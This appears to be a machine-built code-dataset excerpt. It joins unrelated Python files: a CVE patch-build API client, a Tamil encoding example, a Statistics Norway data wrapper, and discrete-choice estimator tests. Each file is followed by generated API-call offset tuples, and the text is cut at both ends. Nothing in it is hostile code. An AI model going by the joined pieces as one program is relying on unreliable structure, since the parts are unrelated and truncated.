if len(id) > 1 and id[0] == '<' and id[-1] == '>' and id != "<removed>":
with open(id[1:-1]) as data_file:
return json.load(data_file)
return self._requestGET(path=path % id)
#TODO catch empty
def reprJSON(self):
r = {}
for k, v in self.__dict__.iteritems():
if k in self._postableFields: r[k] = v
return r
class CVE(Remote):
def __init__(self, name=None, id=None):
Remote.__init__(self)
if id: cve = self._findById("cves/%s", id)
elif name: cve = self._findByName(name)
else: raise Exception('You have to give something to construct this CVE')
self.__dict__.update(cve)
def _findByName(self,name):
cves = self._requestGET(where={"name": name}, path='cves')
if len(cves) == 1:
return cves[0]
elif len(cves) == 0:
raise Exception('CVE id not found: %s' % name)
else:
raise Exception('Multiple CVEs match %s' % name)
def __getattr__(self, item):
if item is "patchsets":
patchsets = self._requestGET(path="cves/%s/patchsets" % self.id)
self.patchsets = [Patchsets(json=patchset) for patchset in patchsets]
return self.patchsets
else:
raise AttributeError(item)
class Patchsets(Remote):
def __init__(self,json={}):
Remote.__init__(self)
self.__dict__.update(json)
def __getattr__(self, item):
if item is "patches":
patches = self._requestGET(path="patchsets/%s/patches" % self.id)
self.patches = [Hunk(json=patch) for patch in patches]
return self.patches
else:
raise AttributeError(item)
class Patch(Remote):
def __init__(self,json={}):
Remote.__init__(self)
self.__dict__.update(json)
def __getattr__(self, item):
if item is "hunks":
hunks = self._requestGET(path="patches/%s/hunks" % self.id)
self.hunks= [Hunk(json=patch) for patch in hunks]
return self.hunks
else:
raise AttributeError(item)
class Hunk(Remote):
_postableFields = [
'cveId',
'data',
'fileName',
'id',
'patchId',
'patchsetId'
]
def __init__(self,json={},id=None):
Remote.__init__(self)
if id: json=self._findById("hunks/%s", id)
self.__dict__.update(json)
def __getattr__(self, item):
if item is "hunks":
hunks = self._requestGET(path="patches/%s/hunks" % self.id)
self.hunks= [Hunk(json=patch) for patch in hunks]
elif item is "cve":
self.cve = CVE(id=self.cveId)
else:
return self.__dict__[item]
return getattr(self,item)
class Setup(Remote):
def __init__(self,json={},id=None):
Remote.__init__(self)
if id: json=self._findById("setups/%s", id)
self.name = json['name']
self.content = json['content']
self.id = json['id']
class Build(Remote):
_postableFields = ['pkgName',
'pkgVersion',
'mode',
'status',
'dist',
'urgency',
'hunks',
'results',
'cveId',
'patchsetId',
'cveName',
'id']
def __init__(self,json={},where=None, id=None):
'''if empty, get the next waiting build.
with where, it gives you the next waiting with that filter'''
Remote.__init__(self)
if id: json = self._findById("builds/%s",id)
if not json: json = self._nextWaiting(where=where)
if not json:
from json import dumps
raise Exception('No pending builds (filter: %s)' % dumps(where))
self.__dict__.update(json)
def _nextWaiting(self,json={},where={}):
where["status"] = "waiting"
result = self._requestGET(where=where, limit=1, order='timestamp ASC', path='builds')
if len(result): return result[0]
else: return None
def updateResults(self,data):
if not isinstance(data,list):
data = [data]
o = {'buildId':self.id, 'data': {}}
for d in data:
o['data'] = d
self._requestPOST(path='results', data=json.dumps(o))
# TODO update the object with the new data?
def updateStatus(self, status):
result = self._requestPATCH(path='builds/%s' % self.id,data=json.dumps({'status': status}))
# TODO update the object with the new data?
return result
def updateStarted(self, now):
result = self._requestPATCH(path='builds/%s' % self.id,data=json.dumps({'started': now}))
return result
def postme(self):
data = json.dumps(self.reprJSON(), cls=ComplexEncoder)
result = self._requestPOST(path='builds',data=data)
return Build(result)
class RemoteEncoder(json.JSONEncoder):
def default(self, o):
r = {}
if type(o) is str: return o
for k,v in o.__dict__.iteritems():
if k in o._postableFields: r[k] = json.dumps(v, cls=RemoteEncoder)
return r
class ComplexEncoder(json.JSONEncoder):
def default(self, obj):
if hasattr(obj,'reprJSON'):
return obj.reprJSON()
else:
return json.JSONEncoder.default(self, obj)
class Result(Remote):
_postableFields =[
'children',
'deb',
'debdiff',
'hunkId',
'id',
'log',
'results',
'status',
'type']
def __init__(self, json={}):
Remote.__init__(self)
self.__dict__.update(json)
class Results(list):
def __init__(self, results=[],buildId=None):
list.__init__(self)
if buildId:
r = Remote()
results = r._requestGET(where={"buildId": buildId}, path='results')
for result in results:
self.append(Result(json=result))
|
[
"requests.patch",
"json.load",
"json.dumps",
"requests.delete",
"json.JSONEncoder.default",
"requests.get",
"requests.post",
"os.getenv"
] |
[((1170, 1185), 'os.getenv', 'getenv', (['"""TOKEN"""'], {}), "('TOKEN')\n", (1176, 1185), False, 'from os import getenv\n'), ((1611, 1655), 'requests.post', 'requests.post', (['u'], {'data': 'data', 'headers': 'headers'}), '(u, data=data, headers=headers)\n', (1624, 1655), False, 'import requests\n'), ((1974, 2019), 'requests.patch', 'requests.patch', (['u'], {'data': 'data', 'headers': 'headers'}), '(u, data=data, headers=headers)\n', (1988, 2019), False, 'import requests\n'), ((2275, 2293), 'requests.delete', 'requests.delete', (['u'], {}), '(u)\n', (2290, 2293), False, 'import requests\n'), ((2800, 2815), 'requests.get', 'requests.get', (['u'], {}), '(u)\n', (2812, 2815), False, 'import requests\n'), ((8588, 8623), 'json.JSONEncoder.default', 'json.JSONEncoder.default', (['self', 'obj'], {}), '(self, obj)\n', (8612, 8623), False, 'import json\n'), ((2756, 2774), 'json.dumps', 'json.dumps', (['filter'], {}), '(filter)\n', (2766, 2774), False, 'import json\n'), ((3250, 3270), 'json.load', 'json.load', (['data_file'], {}), '(data_file)\n', (3259, 3270), False, 'import json\n'), ((7724, 7754), 'json.dumps', 'json.dumps', (["{'status': status}"], {}), "({'status': status})\n", (7734, 7754), False, 'import json\n'), ((7933, 7961), 'json.dumps', 'json.dumps', (["{'started': now}"], {}), "({'started': now})\n", (7943, 7961), False, 'import json\n'), ((8366, 8398), 'json.dumps', 'json.dumps', (['v'], {'cls': 'RemoteEncoder'}), '(v, cls=RemoteEncoder)\n', (8376, 8398), False, 'import json\n'), ((7016, 7028), 'json.dumps', 'dumps', (['where'], {}), '(where)\n', (7021, 7028), False, 'from json import dumps\n'), ((7552, 7565), 'json.dumps', 'json.dumps', (['o'], {}), '(o)\n', (7562, 7565), False, 'import json\n')]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# (C) 2014 Arulalan.T <<EMAIL>>
# (C) 2015 <NAME>
# This file is part of 'open-tamil/txt2unicode' package examples
#
import sys
sys.path.append("../..")
from tamil.txt2unicode import tscii2unicode, unicode2tscii
tscii = """¾¢ÕÅûÙÅ÷ «ÕǢ ¾¢ÕìÌÈû """
uni_1 = tscii2unicode(tscii)
tscii_from_uni = unicode2tscii(uni_1)
uni_2 = tscii2unicode(tscii_from_uni)
f = open("encode-result.txt", "w")
f.write("Initial tscii : " + tscii + "\n\n")
f.write("From tscii to unicode : " + uni_1 + "\n\n")
f.write("From unicode to tscii : " + tscii_from_uni + "\n\n")
f.write("Again back to unicode from above tscii : " + uni_2)
f.close()
assert uni_1 == uni_2, " Both unicode are 'not' same! "
assert tscii == tscii_from_uni, " Both tscii are 'not' same! "
print("tscii original input", tscii)
print("from tscii2unicode", uni_1)
print("from unicode2tscii", tscii_from_uni)
print("back to unicode", uni_2)
print("converted unicode stored in 'encode-result.txt' file")
|
[
"sys.path.append",
"tamil.txt2unicode.tscii2unicode",
"tamil.txt2unicode.unicode2tscii"
] |
[((177, 201), 'sys.path.append', 'sys.path.append', (['"""../.."""'], {}), "('../..')\n", (192, 201), False, 'import sys\n'), ((309, 329), 'tamil.txt2unicode.tscii2unicode', 'tscii2unicode', (['tscii'], {}), '(tscii)\n', (322, 329), False, 'from tamil.txt2unicode import tscii2unicode, unicode2tscii\n'), ((347, 367), 'tamil.txt2unicode.unicode2tscii', 'unicode2tscii', (['uni_1'], {}), '(uni_1)\n', (360, 367), False, 'from tamil.txt2unicode import tscii2unicode, unicode2tscii\n'), ((376, 405), 'tamil.txt2unicode.tscii2unicode', 'tscii2unicode', (['tscii_from_uni'], {}), '(tscii_from_uni)\n', (389, 405), False, 'from tamil.txt2unicode import tscii2unicode, unicode2tscii\n')]
|
"""
coding: utf-8
@authour: <NAME>, modified <NAME>
Inspired by:
https://github.com/hmelberg/stats-to-pandas/blob/master/stats_to_pandas/__init__.py
https://github.com/eurostat/prophet
"""
from __future__ import print_function
import pandas as pd
import requests
import ast
from pyjstat import pyjstat
from collections import OrderedDict
from ipywidgets import widgets
from IPython.display import display
# todo: consider using jsonstat instead of pyjstat
class API_to_data:
def __init__(self, language='en', base_url='http://data.ssb.no/api/v0'):
"""
Parameters:
-----------
language: string
default in Statistics Norway: 'en' (Search for English words)
optional in Statistics Norway: 'no' (Search for Norwegian words)
url: string
default in Statistics Norway: 'http://data.ssb.no/api/v0'
different defaults can be specified
"""
self.language = language
self.burl = base_url
self.furl = None
self.variables = None
self.time = None
def search(self, phrase):
"""
Search for tables that contain the phrase in Statistics Norway.
Returns a pandas dataframe with the results.
Not case sensitive.
Language sensitive (specified in the language option)
Example
-------
df = search("income")
Parameters
----------
phrase: string
The phrase can contain several words (space separated):
search("export Norwegian parrot")
It also supports trucation:
search("pharma*")
"""
# todo: make converter part of the default specification only for statistics norway
convert = {'æ' : '%C3%A6', 'Æ' : '%C3%86', 'ø' : '%C3%B8', 'Ø' : '%C3%98', 'å' : '%C3%A5', 'Å' : '%C3%85',
'"' : '%22', '(' : '%28', ')' : '%29', ' ' : '%20'}
search_str = '{base_url}/{language}/table/?query={phrase}'.format(base_url=self.burl, language=self.language, phrase=phrase)
for k, v in convert.items():
search_str = search_str.replace(k, v)
df = pd.read_json(search_str)
if len(df) == 0:
print("No match")
return df
# make the dataframe more readable
# (is it worth it? increases vulnerability. formats may differ and change)
# todo: make search and format conditional on the database being searched
# split the table name into table id and table text
df['table_id'] = df['title'].str.split(':').str.get(0)
df['table_title'] = df['title'].str.split(':').str.get(1)
del df['title']
# make table_id the index, visually more intuitive with id as first column
df = df.set_index('table_id')
# change order of columns to make it more intuitive (table_title is first)
cols = df.columns.tolist()
cols.sort(reverse=True)
df = df[cols[:-2]]
return df
def get_variables(self, table_id=None):
"""
Returns a list.
Each element of the list is a dictionary that provides more
information about a variable.
For instance, one variable may contain information about the
different years that are available.
Parameters
----------
table_id: string
the unique table_id number, a string including leading zeros.
"""
try:
numb = int(table_id)
if len(str(numb)) == 4:
numb = '0' + str(numb)
except ValueError:
print('table_id mus be of type integer')
if self.furl is None:
self.furl = '{base_url}/{language}/table/{table_id}'.format(base_url=self.burl, language=self.language,
table_id=numb)
df = pd.read_json(self.furl)
variables = [dict(values) for values in df.iloc[:, 1]]
return variables
def select(self, table_id):
"""
Selects a table based on the table_id and returns a widget container
in which the user can select the set of variables and values to be
included in the final table.
Example
--------
box = select(table_id = '10714')
Parameters
----------
table_id : string
the id of the desired table
"""
# get a list with dictionaries containing information about each variable
self.variables = self.get_variables(table_id=table_id)
table_info = pd.read_json(self.furl)
table_title = table_info.iloc[0, 0]
# get number of variables (ok, childish approach, can be simplified!)
nvars = len(self.variables)
var_list = list(range(nvars))
# a list of dictionaries of the values available for each variable
option_list = [OrderedDict(zip(self.variables[var]['valueTexts'],
self.variables[var]['values']))
for var in var_list]
# create a selection widget for each variable
# todo: skip widget or make it invisible if there is only one option?
# todo: make first alternative a default selection initially for all tables?
# todo: add buttons for selecting "all", "latest" , "first" and "none"
selection_widgets = [widgets.widget_selection.SelectMultiple(
options=option_list[var],
rows=8,
layout={'width' : '500px'}
)
for var in var_list]
# put all the widgets in a container
variables_container = widgets.Tab(selection_widgets)
# label each container with the variable label
for var in var_list:
title = str(self.variables[var]['text'])
variables_container.set_title(var, title)
# build widgets and put in one widget container
headline = widgets.Label(value = table_title, color = 'blue')
endline = widgets.Label(value='''Select category and click on elements
to be included in the table (CTRL-A selects "all")''')
url_text = widgets.Label(value=self.furl)
from IPython.display import display
button = widgets.Button(description="Click when finished")
selection_container = widgets.VBox([headline,
endline,
variables_container,
url_text,
button])
selection_container.layout.border = '3px grey solid'
def clicked(b):
print('Info is saved. You can now run the rest of the code :)')
button.on_click(clicked)
return selection_container
def get_json(self, box=None, out='dict'):
"""
Takes a widget container as input (where the user has selected varables)
and returns a json dictionary or string that will fetch these variables.
The json follows the json-stat format.
Parameters
----------
box : widget container
name of widget box with the selected variables
out : string
default: 'dict', options: 'str'
The json can be returned as a dictionary or a string.
The final end query should use a dict, but some may find it useful to
get the string and revise it before transforming it back to a dict.
Example
-------
json_query = get_json(box)
"""
table_url = box.children[3].value
nvars = len(box.children[2].children)
var_list = list(range(nvars))
query_element = {}
# create a dict of strings, one for each variable that specifies
# the json-stat that selects the variables/values
for x in var_list:
value_list = str(list(box.children[2].children[x].value))
query_element[x] = '{{"code": "{code}", "selection": {{"filter": "item", "values": {values} }}}}'.format(
code = self.variables[x]['code'],
values = value_list)
query_element[x] = query_element[x].replace("\'", '"')
all_elements = str(list(query_element.values()))
all_elements = all_elements.replace("\'", "")
query = '{{"query": {all_elements} , "response": {{"format": "json-stat" }}}}'.format(all_elements = all_elements)
if out == 'dict':
query = ast.literal_eval(query)
# todo: build it as a dictionary to start with (and not a string that is made into a dict as now)
# todo: add error message if required variables are not selected
# todo: avoid repeat downloading of same information
# eg. get_variables is sometimes used three times before a table is downloaded
return query
def to_dict(json_str):
"""
Transforms a string to a dictionary.
Note: Will fail if string is not correctly specified.
"""
# OK, really unnecessary func, but a concession to less experienced users
# todo: use json module instead, json.dumps()
query = ast.literal_eval(json_str)
return query
def read_box(self, from_box):
"""
Takes a widget container as input (where the user has selected varables)
and returns a pandas dataframe with the values for the selected variables.
Example
-------
df = read_box(box)
Parameters:
-----------
from_box: widget container
"""
try:
query = self.get_json(from_box)
url = from_box.children[3].value
data = requests.post(url, json=query)
results = pyjstat.from_json_stat(data.json(object_pairs_hook=OrderedDict))
label = data.json(object_pairs_hook=OrderedDict)
return [results[0], label['dataset']['label']]
except TypeError:
print('You must make choices in the box!')
except:
print('You must make choices in the box!')
def fiksDato(self, dato):
hjdat = int(dato[5:6]) * 3
hjdat2 = str(hjdat)
if hjdat < 12:
dato = dato[0:4] + '-0' + hjdat2
else:
dato = dato[0:4] + '-' + hjdat2
dates = pd.date_range(dato, periods=1, freq='M')
dato = str(dates[0])
return dato
def prepare_dataframe(self, df, val_col='value'):
"""
Parameters:
-----------
time_col : type sting
Name of time column (for SSB-data, usually 'uke', 'måned', 'år' og 'kvartal' in norwegian)
val_col : type string
Name of column containing the values (usually 'value')
df : typ pandas.DataFrame
The dataset one want to make forecast of
"""
self.time = time_col = df.columns[-2]
if self.language == 'no':
df_ret = df[[self.time, val_col]]
if 'M' in df_ret.loc[0, self.time]:
self.time = 'måned'
df_ret = df[[self.time, val_col]]
df_ret.loc[:, self.time] = pd.to_datetime(df[self.time].str.replace('M', '-'))
freq = 'M';
periods = 12;
elif 'U' in df_ret.loc[0, self.time]:
self.time = 'uke'
df_ret = df[[self.time, val_col]]
df_ret.loc[:, self.time] = pd.to_datetime((df[self.time].str.replace('U', '-')).add('-1'), format='%Y-%W-%w')
freq = 'W'
periods = 52
elif 'K' in df_ret.loc[0, self.time]:
self.time = 'kvartal'
df_ret = df[[self.time, val_col]]
df_ret.loc[:, self.time] = pd.to_datetime(df[self.time].str.replace('K', '-'))
df_ret.loc[:, self.time] = df[self.time].apply(self.fiksDato)
freq = 'q'
periods = 4
else:
self.time = 'år'
df_ret = df[[self.time, val_col]]
df_ret.loc[:, self.time] = pd.to_datetime(df[self.time])
freq = 'y'
periods = 1
elif self.language == 'en':
df_ret = df[[self.time, val_col]]
if 'M' in df_ret.loc[0, self.time]:
self.time = 'month'
df_ret = df[[self.time, val_col]]
df_ret.loc[:, self.time] = pd.to_datetime(df[self.time].str.replace('M', '-'))
freq = 'M'
periods = 12
elif 'U' in df_ret.loc[0, self.time]:
self.time = 'week'
df_ret = df[[self.time, val_col]]
df_ret.loc[:, self.time] = pd.to_datetime((df[self.time].str.replace('U', '-')).add('-1'), format='%Y-%W-%w')
freq = 'W'
periods = 52
elif 'K' in df_ret.loc[0, self.time]:
self.time = 'quarter'
df_ret = df[[self.time, val_col]]
df_ret.loc[:, self.time] = pd.to_datetime(df[self.time].str.replace('K', '-'))
df_ret.loc[:, self.time] = df[self.time].apply(self.fiksDato)
freq = 'q'
periods = 4
else:
self.time = 'year'
df_ret = df[[self.time, val_col]]
df_ret.loc[:, self.time] = pd.to_datetime(df[self.time])
freq = 'y'
periods = 1
#the input to `Prophet` is always a `pandas.DataFrame` object, and it must contain two columns: `ds` and `y`:
df_ret.columns = ['ds', 'y']
return [df_ret, freq, periods]
|
[
"pandas.date_range",
"pandas.read_json",
"ipywidgets.widgets.Button",
"ipywidgets.widgets.Label",
"pandas.to_datetime",
"ipywidgets.widgets.Tab",
"ast.literal_eval",
"ipywidgets.widgets.widget_selection.SelectMultiple",
"requests.post",
"ipywidgets.widgets.VBox"
] |
[((2200, 2224), 'pandas.read_json', 'pd.read_json', (['search_str'], {}), '(search_str)\n', (2212, 2224), True, 'import pandas as pd\n'), ((3961, 3984), 'pandas.read_json', 'pd.read_json', (['self.furl'], {}), '(self.furl)\n', (3973, 3984), True, 'import pandas as pd\n'), ((4675, 4698), 'pandas.read_json', 'pd.read_json', (['self.furl'], {}), '(self.furl)\n', (4687, 4698), True, 'import pandas as pd\n'), ((5846, 5876), 'ipywidgets.widgets.Tab', 'widgets.Tab', (['selection_widgets'], {}), '(selection_widgets)\n', (5857, 5876), False, 'from ipywidgets import widgets\n'), ((6145, 6191), 'ipywidgets.widgets.Label', 'widgets.Label', ([], {'value': 'table_title', 'color': '"""blue"""'}), "(value=table_title, color='blue')\n", (6158, 6191), False, 'from ipywidgets import widgets\n'), ((6215, 6353), 'ipywidgets.widgets.Label', 'widgets.Label', ([], {'value': '"""Select category and click on elements \n to be included in the table (CTRL-A selects "all")"""'}), '(value=\n """Select category and click on elements \n to be included in the table (CTRL-A selects "all")"""\n )\n', (6228, 6353), False, 'from ipywidgets import widgets\n'), ((6364, 6394), 'ipywidgets.widgets.Label', 'widgets.Label', ([], {'value': 'self.furl'}), '(value=self.furl)\n', (6377, 6394), False, 'from ipywidgets import widgets\n'), ((6457, 6506), 'ipywidgets.widgets.Button', 'widgets.Button', ([], {'description': '"""Click when finished"""'}), "(description='Click when finished')\n", (6471, 6506), False, 'from ipywidgets import widgets\n'), ((6538, 6610), 'ipywidgets.widgets.VBox', 'widgets.VBox', (['[headline, endline, variables_container, url_text, button]'], {}), '([headline, endline, variables_container, url_text, button])\n', (6550, 6610), False, 'from ipywidgets import widgets\n'), ((9425, 9451), 'ast.literal_eval', 'ast.literal_eval', (['json_str'], {}), '(json_str)\n', (9441, 9451), False, 'import ast\n'), ((10585, 10625), 'pandas.date_range', 'pd.date_range', (['dato'], {'periods': '(1)', 'freq': '"""M"""'}), "(dato, periods=1, freq='M')\n", (10598, 10625), True, 'import pandas as pd\n'), ((5488, 5592), 'ipywidgets.widgets.widget_selection.SelectMultiple', 'widgets.widget_selection.SelectMultiple', ([], {'options': 'option_list[var]', 'rows': '(8)', 'layout': "{'width': '500px'}"}), "(options=option_list[var], rows=8,\n layout={'width': '500px'})\n", (5527, 5592), False, 'from ipywidgets import widgets\n'), ((8737, 8760), 'ast.literal_eval', 'ast.literal_eval', (['query'], {}), '(query)\n', (8753, 8760), False, 'import ast\n'), ((9958, 9988), 'requests.post', 'requests.post', (['url'], {'json': 'query'}), '(url, json=query)\n', (9971, 9988), False, 'import requests\n'), ((12358, 12387), 'pandas.to_datetime', 'pd.to_datetime', (['df[self.time]'], {}), '(df[self.time])\n', (12372, 12387), True, 'import pandas as pd\n'), ((13641, 13670), 'pandas.to_datetime', 'pd.to_datetime', (['df[self.time]'], {}), '(df[self.time])\n', (13655, 13670), True, 'import pandas as pd\n')]
|
import numpy as np
from source_ddc.simulation_tools import simulate
from source_ddc.algorithms import NFXP, NPL, CCP
from source_ddc.probability_tools import StateManager, random_ccp
from test.utils.functional_tools import average_out
n_repetitions = 10
def test_nfxp(simple_transition_matrix):
def utility_fn(theta, choices, states):
m_states, m_actions = np.meshgrid(states, choices)
return (theta[0] * np.log(m_states + 1) - theta[1] * m_actions).reshape((len(choices), -1, 1))
true_params = [0.5, 3]
discount_factor = 0.95
n_choices = 2
n_states = 5
state_manager = StateManager(miles=n_states)
@average_out(n_repetitions)
def test():
df, _ = simulate(
500,
100,
n_choices,
state_manager,
true_params,
utility_fn,
discount_factor,
simple_transition_matrix
)
algorithm = NFXP(
df['action'].values,
df['state'].values,
simple_transition_matrix,
utility_fn,
discount_factor,
parameter_names=['variable_cost', 'replacement_cost']
)
return algorithm.estimate(start_params=[-1, -1], method='bfgs')
mean_params = test()
tolerance_levels = np.array([0.05, 0.05])
assert np.all(np.abs(mean_params - true_params) < tolerance_levels)
def test_ccp(simple_transition_matrix):
def utility_fn(theta, choices, states):
m_states, m_actions = np.meshgrid(states, choices)
return (theta[0] * np.log(m_states + 1) - theta[1] * m_actions).reshape((len(choices), -1, 1))
true_params = [0.5, 3]
discount_factor = 0.95
n_choices = 2
n_states = 5
state_manager = StateManager(miles=n_states)
@average_out(n_repetitions)
def test():
df, ccp = simulate(
500,
100,
n_choices,
state_manager,
true_params,
utility_fn,
discount_factor,
simple_transition_matrix
)
algorithm = CCP(
df['action'].values,
df['state'].values,
simple_transition_matrix,
utility_fn,
discount_factor,
initial_p=ccp,
parameter_names=['variable_cost', 'replacement_cost']
)
return algorithm.estimate(start_params=[1, 1], method='bfgs')
mean_params = test()
tolerance_levels = np.array([0.05, 0.05])
assert np.all(np.abs(mean_params - true_params) < tolerance_levels)
def test_npl(simple_transition_matrix):
def utility_fn(theta, choices, states):
m_states, m_actions = np.meshgrid(states, choices)
return (theta[0] * np.log(m_states + 1) - theta[1] * m_actions).reshape((len(choices), -1, 1))
true_params = [0.5, 3]
discount_factor = 0.95
n_choices = 2
n_states = 5
state_manager = StateManager(miles=n_states)
@average_out(n_repetitions)
def test():
df, _ = simulate(
500,
100,
n_choices,
state_manager,
true_params,
utility_fn,
discount_factor,
simple_transition_matrix)
ccp = random_ccp(n_states, n_choices)
algorithm = NPL(
df['action'].values,
df['state'].values,
simple_transition_matrix,
utility_fn,
discount_factor,
initial_p=ccp,
parameter_names=['variable_cost', 'replacement_cost']
)
return algorithm.estimate(start_params=[1, 1], method='bfgs')
mean_params = test()
tolerance_levels = np.array([0.05, 0.05])
assert np.all(np.abs(mean_params - true_params) < tolerance_levels)
def test_npl_relaxation_param(simple_transition_matrix):
def utility_fn(theta, choices, states):
m_states, m_actions = np.meshgrid(states, choices)
return (theta[0] * np.log(m_states + 1) - theta[1] * m_actions).reshape((len(choices), -1, 1))
true_params = [0.5, 3]
discount_factor = 0.95
n_choices = 2
n_states = 5
state_manager = StateManager(miles=n_states)
@average_out(n_repetitions)
def test():
df, _ = simulate(500,
100,
n_choices,
state_manager,
true_params,
utility_fn,
discount_factor,
simple_transition_matrix)
ccp = random_ccp(n_states, n_choices)
algorithm = NPL(
df['action'].values,
df['state'].values,
simple_transition_matrix,
utility_fn,
discount_factor,
initial_p=ccp,
relaxation_param=0.9,
parameter_names=['variable_cost', 'replacement_cost'],
npl_maxiter=50
)
return algorithm.estimate(start_params=[1, 1], method='bfgs')
mean_params = test()
tolerance_levels = np.array([0.05, 0.05])
assert np.all(np.abs(mean_params - true_params) < tolerance_levels)
|
[
"numpy.meshgrid",
"numpy.abs",
"numpy.log",
"source_ddc.probability_tools.StateManager",
"test.utils.functional_tools.average_out",
"source_ddc.algorithms.NPL",
"source_ddc.probability_tools.random_ccp",
"numpy.array",
"source_ddc.simulation_tools.simulate",
"source_ddc.algorithms.CCP",
"source_ddc.algorithms.NFXP"
] |
[((616, 644), 'source_ddc.probability_tools.StateManager', 'StateManager', ([], {'miles': 'n_states'}), '(miles=n_states)\n', (628, 644), False, 'from source_ddc.probability_tools import StateManager, random_ccp\n'), ((651, 677), 'test.utils.functional_tools.average_out', 'average_out', (['n_repetitions'], {}), '(n_repetitions)\n', (662, 677), False, 'from test.utils.functional_tools import average_out\n'), ((1310, 1332), 'numpy.array', 'np.array', (['[0.05, 0.05]'], {}), '([0.05, 0.05])\n', (1318, 1332), True, 'import numpy as np\n'), ((1765, 1793), 'source_ddc.probability_tools.StateManager', 'StateManager', ([], {'miles': 'n_states'}), '(miles=n_states)\n', (1777, 1793), False, 'from source_ddc.probability_tools import StateManager, random_ccp\n'), ((1800, 1826), 'test.utils.functional_tools.average_out', 'average_out', (['n_repetitions'], {}), '(n_repetitions)\n', (1811, 1826), False, 'from test.utils.functional_tools import average_out\n'), ((2485, 2507), 'numpy.array', 'np.array', (['[0.05, 0.05]'], {}), '([0.05, 0.05])\n', (2493, 2507), True, 'import numpy as np\n'), ((2940, 2968), 'source_ddc.probability_tools.StateManager', 'StateManager', ([], {'miles': 'n_states'}), '(miles=n_states)\n', (2952, 2968), False, 'from source_ddc.probability_tools import StateManager, random_ccp\n'), ((2975, 3001), 'test.utils.functional_tools.average_out', 'average_out', (['n_repetitions'], {}), '(n_repetitions)\n', (2986, 3001), False, 'from test.utils.functional_tools import average_out\n'), ((3695, 3717), 'numpy.array', 'np.array', (['[0.05, 0.05]'], {}), '([0.05, 0.05])\n', (3703, 3717), True, 'import numpy as np\n'), ((4167, 4195), 'source_ddc.probability_tools.StateManager', 'StateManager', ([], {'miles': 'n_states'}), '(miles=n_states)\n', (4179, 4195), False, 'from source_ddc.probability_tools import StateManager, random_ccp\n'), ((4202, 4228), 'test.utils.functional_tools.average_out', 'average_out', (['n_repetitions'], {}), '(n_repetitions)\n', (4213, 4228), False, 'from test.utils.functional_tools import average_out\n'), ((5063, 5085), 'numpy.array', 'np.array', (['[0.05, 0.05]'], {}), '([0.05, 0.05])\n', (5071, 5085), True, 'import numpy as np\n'), ((373, 401), 'numpy.meshgrid', 'np.meshgrid', (['states', 'choices'], {}), '(states, choices)\n', (384, 401), True, 'import numpy as np\n'), ((710, 826), 'source_ddc.simulation_tools.simulate', 'simulate', (['(500)', '(100)', 'n_choices', 'state_manager', 'true_params', 'utility_fn', 'discount_factor', 'simple_transition_matrix'], {}), '(500, 100, n_choices, state_manager, true_params, utility_fn,\n discount_factor, simple_transition_matrix)\n', (718, 826), False, 'from source_ddc.simulation_tools import simulate\n'), ((950, 1113), 'source_ddc.algorithms.NFXP', 'NFXP', (["df['action'].values", "df['state'].values", 'simple_transition_matrix', 'utility_fn', 'discount_factor'], {'parameter_names': "['variable_cost', 'replacement_cost']"}), "(df['action'].values, df['state'].values, simple_transition_matrix,\n utility_fn, discount_factor, parameter_names=['variable_cost',\n 'replacement_cost'])\n", (954, 1113), False, 'from source_ddc.algorithms import NFXP, NPL, CCP\n'), ((1522, 1550), 'numpy.meshgrid', 'np.meshgrid', (['states', 'choices'], {}), '(states, choices)\n', (1533, 1550), True, 'import numpy as np\n'), ((1861, 1977), 'source_ddc.simulation_tools.simulate', 'simulate', (['(500)', '(100)', 'n_choices', 'state_manager', 'true_params', 'utility_fn', 'discount_factor', 'simple_transition_matrix'], {}), '(500, 100, n_choices, state_manager, true_params, utility_fn,\n discount_factor, simple_transition_matrix)\n', (1869, 1977), False, 'from source_ddc.simulation_tools import simulate\n'), ((2101, 2279), 'source_ddc.algorithms.CCP', 'CCP', (["df['action'].values", "df['state'].values", 'simple_transition_matrix', 'utility_fn', 'discount_factor'], {'initial_p': 'ccp', 'parameter_names': "['variable_cost', 'replacement_cost']"}), "(df['action'].values, df['state'].values, simple_transition_matrix,\n utility_fn, discount_factor, initial_p=ccp, parameter_names=[\n 'variable_cost', 'replacement_cost'])\n", (2104, 2279), False, 'from source_ddc.algorithms import NFXP, NPL, CCP\n'), ((2697, 2725), 'numpy.meshgrid', 'np.meshgrid', (['states', 'choices'], {}), '(states, choices)\n', (2708, 2725), True, 'import numpy as np\n'), ((3034, 3150), 'source_ddc.simulation_tools.simulate', 'simulate', (['(500)', '(100)', 'n_choices', 'state_manager', 'true_params', 'utility_fn', 'discount_factor', 'simple_transition_matrix'], {}), '(500, 100, n_choices, state_manager, true_params, utility_fn,\n discount_factor, simple_transition_matrix)\n', (3042, 3150), False, 'from source_ddc.simulation_tools import simulate\n'), ((3259, 3290), 'source_ddc.probability_tools.random_ccp', 'random_ccp', (['n_states', 'n_choices'], {}), '(n_states, n_choices)\n', (3269, 3290), False, 'from source_ddc.probability_tools import StateManager, random_ccp\n'), ((3312, 3490), 'source_ddc.algorithms.NPL', 'NPL', (["df['action'].values", "df['state'].values", 'simple_transition_matrix', 'utility_fn', 'discount_factor'], {'initial_p': 'ccp', 'parameter_names': "['variable_cost', 'replacement_cost']"}), "(df['action'].values, df['state'].values, simple_transition_matrix,\n utility_fn, discount_factor, initial_p=ccp, parameter_names=[\n 'variable_cost', 'replacement_cost'])\n", (3315, 3490), False, 'from source_ddc.algorithms import NFXP, NPL, CCP\n'), ((3924, 3952), 'numpy.meshgrid', 'np.meshgrid', (['states', 'choices'], {}), '(states, choices)\n', (3935, 3952), True, 'import numpy as np\n'), ((4261, 4377), 'source_ddc.simulation_tools.simulate', 'simulate', (['(500)', '(100)', 'n_choices', 'state_manager', 'true_params', 'utility_fn', 'discount_factor', 'simple_transition_matrix'], {}), '(500, 100, n_choices, state_manager, true_params, utility_fn,\n discount_factor, simple_transition_matrix)\n', (4269, 4377), False, 'from source_ddc.simulation_tools import simulate\n'), ((4564, 4595), 'source_ddc.probability_tools.random_ccp', 'random_ccp', (['n_states', 'n_choices'], {}), '(n_states, n_choices)\n', (4574, 4595), False, 'from source_ddc.probability_tools import StateManager, random_ccp\n'), ((4617, 4832), 'source_ddc.algorithms.NPL', 'NPL', (["df['action'].values", "df['state'].values", 'simple_transition_matrix', 'utility_fn', 'discount_factor'], {'initial_p': 'ccp', 'relaxation_param': '(0.9)', 'parameter_names': "['variable_cost', 'replacement_cost']", 'npl_maxiter': '(50)'}), "(df['action'].values, df['state'].values, simple_transition_matrix,\n utility_fn, discount_factor, 